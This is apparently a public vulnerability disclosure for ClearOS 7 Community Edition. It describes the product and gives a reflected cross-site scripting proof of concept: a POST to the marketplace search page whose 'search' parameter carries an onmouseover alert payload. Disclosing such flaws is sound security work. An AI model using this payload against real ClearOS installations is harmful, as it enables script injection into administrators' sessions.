################################################################################################################################## # Exploit Title: ClearOS 7 Community Edition | Cross-Site Scripting # Date: 06.03.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.clearos.com # Software Link: http://mirror.clearos.com/clearos/7/iso/x86_64/ClearOS-DVD-x86_64.iso # Version: 7 ################################################################################################################################## Introduction ClearOS is a small business server operating system with server, networking, and gateway functions. It is designed primarily for homes, small, medium, and distributed environments. It is managed from a web based user interface, but can also be completely managed and tuned from the command line. ClearOS is available in a free Community Edition, which includes available open source updates and patches from its upstream sources. ClearOS is also offered in a Home and Business Edition which receives additional testing of updates and only uses tested code for updates. Professional tech-support is also available. Currently ClearOS offers around 100+ different features which can be installed through the onboard ClearOS Marketplace. ################################################################################# XSS details ################################################################################# XSS1 | Reflected URL https://192.168.2.104:81/app/marketplace/search METHOD Post PARAMETER search PAYLOAD ' onmouseover=alert(1) ' #################################################################################